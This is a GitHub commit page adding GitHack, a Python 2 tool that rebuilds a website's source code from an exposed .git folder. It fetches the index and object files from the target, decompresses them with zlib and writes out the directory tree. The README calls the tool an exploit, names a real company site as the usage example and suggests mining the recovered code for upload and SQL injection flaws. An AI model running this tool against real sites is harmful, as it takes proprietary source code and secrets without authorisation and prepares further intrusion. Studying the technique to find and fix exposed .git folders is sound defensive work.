Skip to content

Commit

Permalink
init commit
Browse files Browse the repository at this point in the history
  • Loading branch information
lijiejie committed Apr 29, 2015
0 parents commit f4930c0
Show file tree
Hide file tree
Showing 6 changed files with 245 additions and 0 deletions.
75 changes: 75 additions & 0 deletions GitHack.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,75 @@
import sys
import urllib2
import os
import urlparse
import zlib
import threading
import Queue
import re
from lib.parser import parse


if len(sys.argv) == 1:
msg = """
A `.git` folder disclosure exploit. By LiJieJie
Usage: GitHack.py http://www.target.com/.git/
bug-report: my[at]lijiejie.com (http://www.lijiejie.com)
"""
print msg
sys.exit(0)


class Scanner(object):
def __init__(self):
self.base_url = sys.argv[-1]
self.domain = urlparse.urlparse(sys.argv[-1]).netloc.replace(':', '_')
if not os.path.exists(self.domain):
os.mkdir(self.domain)
print '[+] Download and parse index file ...'
data = urllib2.urlopen(sys.argv[-1] + '/index').read()
with open('index', 'wb') as f:
f.write(data)
self.queue = Queue.Queue()
for entry in parse('index'):
if "sha1" in entry.keys():
self.queue.put((entry["sha1"].strip(), entry["name"].strip()))
self.lock = threading.Lock()

def get_back_file(self):
while True:
try:
sha1, file_name = self.queue.get(timeout=0.5)
except:
return
for i in range(3):
try:
folder = '/objects/%s/' % sha1[:2]
data = urllib2.urlopen(self.base_url + folder + sha1[2:]).read()
data = zlib.decompress(data)
data = re.sub('blob \d+\00', '', data)
target_dir = os.path.join(self.domain, os.path.dirname(file_name) )
if target_dir and not os.path.exists(target_dir):
os.makedirs(target_dir)
with open( os.path.join(self.domain, file_name) , 'wb') as f:
f.write(data)
self.lock.acquire()
print '[OK] %s' % file_name
self.lock.release()
break
except KeyboardInterrupt, e:
break
except urllib2.HTTPError, e:
if str(e).find('HTTP Error 404') >=0: break
except Exception, e:
pass

def scan(self):
for i in range(20):
t = threading.Thread(target=self.get_back_file)
t.start()

s = Scanner()
s.scan()
35 changes: 35 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
GitHack
=

GitHack is a `.git` folder disclosure exploit.

It rebuild source code from .git folder while keep directory structure unchanged.

GitHack是一个.git泄露利用脚本,通过泄露的.git文件夹下的文件,重建还原工程源代码。

渗透测试人员、攻击者,可以进一步审计代码,挖掘:文件上传,SQL注射等安全漏洞。

## 脚本的工作原理 ##

* 解析.git/index文件,找到工程中所有的: ( 文件名,文件sha1 )
* 去.git/objects/ 文件夹下下载对应的文件
* 使用zlib解压文件,按原始的目录结构写入源代码

## 它的优点 ##

* 速度快,默认20个工作线程
* 尽量还原所有的源代码,缺失一部分文件不影响脚本工作
* 脚本不需要执行额外的git命令,有python就够了

## 可能的改进##

* 存在文件被gc打包到git\objects\pack的情况,稍后可测试下看能否直接获取并解压这个文件,还原源代码

##用法示例##
GitHack.py http://www.hoolai.com/.git/

##反馈##
* my[at]lijiejie.com
* [http://www.lijiejie.com](http://www.lijiejie.com)


Empty file added lib/__init__.py
Empty file.
Binary file added lib/__init__.pyc
Binary file not shown.
135 changes: 135 additions & 0 deletions lib/parser.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,135 @@
#!/usr/bin/env python
#
# https://github.com/git/git/blob/master/Documentation/technical/index-format.txt
#

import binascii
import collections
import mmap
import struct
import sys


def check(boolean, message):
if not boolean:
import sys
print "error: " + message
sys.exit(1)


def parse(filename, pretty=True):
with open(filename, "rb") as o:
f = mmap.mmap(o.fileno(), 0, access=mmap.ACCESS_READ)

def read(format):
# "All binary numbers are in network byte order."
# Hence "!" = network order, big endian
format = "! " + format
bytes = f.read(struct.calcsize(format))
return struct.unpack(format, bytes)[0]

index = collections.OrderedDict()

# 4-byte signature, b"DIRC"
index["signature"] = f.read(4).decode("ascii")
check(index["signature"] == "DIRC", "Not a Git index file")

# 4-byte version number
index["version"] = read("I")
check(index["version"] in {2, 3},
"Unsupported version: %s" % index["version"])

# 32-bit number of index entries, i.e. 4-byte
index["entries"] = read("I")

yield index

for n in range(index["entries"]):
entry = collections.OrderedDict()

entry["entry"] = n + 1

entry["ctime_seconds"] = read("I")
entry["ctime_nanoseconds"] = read("I")
if pretty:
entry["ctime"] = entry["ctime_seconds"]
entry["ctime"] += entry["ctime_nanoseconds"] / 1000000000
del entry["ctime_seconds"]
del entry["ctime_nanoseconds"]

entry["mtime_seconds"] = read("I")
entry["mtime_nanoseconds"] = read("I")
if pretty:
entry["mtime"] = entry["mtime_seconds"]
entry["mtime"] += entry["mtime_nanoseconds"] / 1000000000
del entry["mtime_seconds"]
del entry["mtime_nanoseconds"]

entry["dev"] = read("I")
entry["ino"] = read("I")

# 4-bit object type, 3-bit unused, 9-bit unix permission
entry["mode"] = read("I")
if pretty:
entry["mode"] = "%06o" % entry["mode"]

entry["uid"] = read("I")
entry["gid"] = read("I")
entry["size"] = read("I")

entry["sha1"] = binascii.hexlify(f.read(20)).decode("ascii")
entry["flags"] = read("H")

# 1-bit assume-valid
entry["assume-valid"] = bool(entry["flags"] & (0b10000000 << 8))
# 1-bit extended, must be 0 in version 2
entry["extended"] = bool(entry["flags"] & (0b01000000 << 8))
# 2-bit stage (?)
stage_one = bool(entry["flags"] & (0b00100000 << 8))
stage_two = bool(entry["flags"] & (0b00010000 << 8))
entry["stage"] = stage_one, stage_two
# 12-bit name length, if the length is less than 0xFFF (else, 0xFFF)
namelen = entry["flags"] & 0xFFF

# 62 bytes so far
entrylen = 62

if entry["extended"] and (index["version"] == 3):
entry["extra-flags"] = read("H")
# 1-bit reserved
entry["reserved"] = bool(entry["extra-flags"] & (0b10000000 << 8))
# 1-bit skip-worktree
entry["skip-worktree"] = bool(entry["extra-flags"] & (0b01000000 << 8))
# 1-bit intent-to-add
entry["intent-to-add"] = bool(entry["extra-flags"] & (0b00100000 << 8))
# 13-bits unused
# used = entry["extra-flags"] & (0b11100000 << 8)
# check(not used, "Expected unused bits in extra-flags")
entrylen += 2

if namelen < 0xFFF:
entry["name"] = f.read(namelen).decode("utf-8", "replace")
entrylen += namelen
else:
# Do it the hard way
name = []
while True:
byte = f.read(1)
if byte == "\x00":
break
name.append(byte)
entry["name"] = b"".join(name).decode("utf-8", "replace")
entrylen += 1

padlen = (8 - (entrylen % 8)) or 8
nuls = f.read(padlen)
check(set(nuls) == set(['\x00']), "padding contained non-NUL")

yield entry

f.close()





Binary file added lib/parser.pyc
Binary file not shown.

0 comments on commit f4930c0

Please sign in to comment.